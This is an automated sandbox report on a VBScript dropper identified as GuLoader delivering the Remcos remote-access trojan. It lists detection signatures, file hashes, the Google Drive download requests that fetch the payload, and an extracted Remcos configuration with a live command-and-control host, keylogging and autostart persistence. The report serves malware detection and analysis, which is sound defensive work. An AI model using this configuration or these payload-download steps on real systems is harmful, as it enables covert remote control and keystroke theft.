Windows Analysis Report
AF85714759_htm#U00b7pdf.vbs

Overview

General Information

Sample name: AF85714759_htm#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: AF85714759_htmpdf.vbs
Analysis ID: 1466654
MD5: e31a921fa7bbdb8a49fec66db0fed99e
SHA1: f43505f1553c845626c6a1a4284277c6ac32679c
SHA256: d991c4cf68d0fa2019a6fb61bb5197a33512372076fac18e6867e598612e8c73
Tags: vbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: 0000000D.00000002.3219431727.0000000009FA8000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7CSH4D", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Yara match File source: 0000000D.00000002.3219431727.0000000009FA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: Binary string: ore.pdb source: powershell.exe, 0000000B.00000002.3210783134.00000000089BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3191614881.000000000327D000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: Malware configuration extractor URLs: a458386d9.duckdns.org
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1_AnTSw4doBUNQkH5iTyWtjjkw3XU0WG6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1_AnTSw4doBUNQkH5iTyWtjjkw3XU0WG6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1_AnTSw4doBUNQkH5iTyWtjjkw3XU0WG6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1_AnTSw4doBUNQkH5iTyWtjjkw3XU0WG6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: powershell.exe, 0000000B.00000002.3200646537.0000000007A23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.3601488920.00000197DBC88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micros5
Source: wscript.exe, 00000000.00000003.2115562363.000001D122D56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7872b684f3f2
Source: wscript.exe, 00000000.00000003.2115320787.000001D122D2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115562363.000001D122D56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7872b684f
Source: powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C5452000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.3601488920.00000197DBC88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000008.00000002.3577666635.00000197D36A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3194915385.000000000615A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3194915385.000000000601E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.3192439698.0000000005116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3192439698.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.3192439698.0000000005116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.3601488920.00000197DBC88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000008.00000002.3596275506.00000197DBA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.coA
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.3192439698.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 0000000B.00000002.3194915385.000000000601E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.3194915385.000000000601E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.3194915385.000000000601E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.g
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.go
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.goo
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.goog
Source: powershell.exe, 00000008.00000002.3436565741.00000197C5415000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googl
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.c
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.co
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C3865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0M
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MG
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGU
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUl
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlc
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5e
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eO
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOl
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZ
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZq
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqt
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtS
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSu
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5u
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uz
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzg
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgP
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPX
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXp
Source: powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3865000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C4AAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_
Source: powershell.exe, 00000008.00000002.3596275506.00000197DBA27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_602
Source: powershell.exe, 0000000B.00000002.3192439698.0000000005116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_XRjlP
Source: powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C3B07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1-z0l_0MGUlcO-5eOlZqtSul5uzgPXph_&export=download
Source: powershell.exe, 0000000B.00000002.3192439698.0000000005116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.3436565741.00000197C48C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.3577666635.00000197D36A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3194915385.000000000615A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3194915385.000000000601E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000008.00000002.3436565741.00000197C3B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C5419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3436565741.00000197C543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.110:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.6:49727 version: TLS 1.2

E-Banking Fraud

barindex
Source: Yara match File source: 0000000D.00000002.3219431727.0000000009FA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: amsi32_7148.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4416, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7148, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4743
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4743 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 4743 Jump to behavior
